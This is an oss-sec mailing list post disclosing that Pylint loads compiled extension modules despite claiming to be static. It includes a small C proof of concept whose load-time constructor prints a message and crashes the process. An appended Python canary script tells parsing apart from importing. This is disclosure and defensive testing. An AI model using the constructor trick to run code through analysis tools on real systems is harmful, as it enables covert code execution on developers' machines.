oss-sec mailing list archives

Pylint checks not as static as one would think


From: Jakub Wilk <jwilk () jwilk net>
Date: Mon, 29 Sep 2014 14:32:21 +0200

Pylint[0] is advertised as "a static code checker, meaning it can analyse your code without actually running it"[1] and that it "does not import live modules"[1].

This is, unfortunately, far from reality. Here's a PoC:

$ cat moo.py
from _moo import *

$ cat moo.c
#include <stdio.h>
#include <signal.h>
/* Runs as soon as the shared object is loaded, i.e. when Python imports _moo. */
void __attribute__((constructor)) moo() {
        printf("moo!\n");
        kill(0, SIGSEGV);
}

$ gcc -Wall -shared -fPIC moo.c -o _moo.so

$ pylint moo.py
No config file found, using default configuration
moo!
Segmentation fault


My understanding is that upstream Pylint maintainers consider this behavior intentional[2]. But even then, I think it's a serious documentation flaw.

Should a CVE ID be assigned to this bug? If yes, it should be a CVE-2010-XXXX.


[0] http://www.pylint.org/
[1] http://docs.pylint.org/faq.html#about-pylint
[2] https://bugs.debian.org/591676#28

--
Jakub Wilk
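The post's PoC relies on a constructor in a C extension, which only fires if the checker actually loads the .so. The same "does it parse or does it import?" question can be asked of any tool that calls itself static, and it can be answered without a compiler. The following is an added example, not code from the original post or from the Pylint project: it writes a constructed pure-Python canary module whose import has an observable side effect (creating a marker file), then contrasts ast.parse(), which never runs the module, with an importlib-based load, which does. The module name canary_mod, the CANARY_MARKER environment variable and the marker file are assumptions of this example. Dropping such a canary into a project and running a checker over it tells you whether that checker stays on the parse side of the line.

```python
"""Canary for 'static' analysis tools: does the tool parse, or does it import?

Added example, not part of the original post. It contrasts ast.parse()
(source is only parsed; no code runs) with an importlib load (top-level
code runs), using a constructed module whose import leaves a marker file.
"""
import ast
import importlib.util
import os
import tempfile

# Constructed canary module (assumption of this example). Its only
# observable effect is the open() at module level, which fires on import
# and never on parse.
CANARY_SOURCE = '''\
import os
MARKER = os.environ.get("CANARY_MARKER", "")
if MARKER:
    with open(MARKER, "w") as fh:
        fh.write("imported\\n")
'''


def write_canary(directory):
    """Write canary_mod.py into directory and return its path."""
    path = os.path.join(directory, "canary_mod.py")
    with open(path, "w") as fh:
        fh.write(CANARY_SOURCE)
    return path


def parse_only(path):
    """Static handling: build an AST from source. Returns the number of
    top-level statements; nothing in the module is executed."""
    with open(path) as fh:
        tree = ast.parse(fh.read(), filename=path)
    return len(tree.body)


def import_module_from_path(path):
    """Dynamic handling: execute the module as a Python import would."""
    spec = importlib.util.spec_from_file_location("canary_mod", path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module


def run_canary(mode):
    """Process the canary under mode 'parse' or 'import'.

    Returns True if the marker file appeared, i.e. the module's top-level
    code ran, and False if it was merely parsed."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "marker.txt")
        os.environ["CANARY_MARKER"] = marker
        try:
            path = write_canary(tmp)
            if mode == "parse":
                parse_only(path)
            elif mode == "import":
                import_module_from_path(path)
            else:
                raise ValueError("mode must be 'parse' or 'import', got %r" % mode)
            return os.path.exists(marker)
        finally:
            os.environ.pop("CANARY_MARKER", None)


if __name__ == "__main__":
    print("parse  executed the module:", run_canary("parse"))
    print("import executed the module:", run_canary("import"))
```

To test a real checker instead of the two functions above, point CANARY_MARKER at a path, run the checker over a directory containing canary_mod.py, and see whether the marker file exists afterwards. This canary is pure Python; the post's trigger is the ELF constructor in moo.c, which covers the case where the checker loads a compiled extension it cannot parse.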

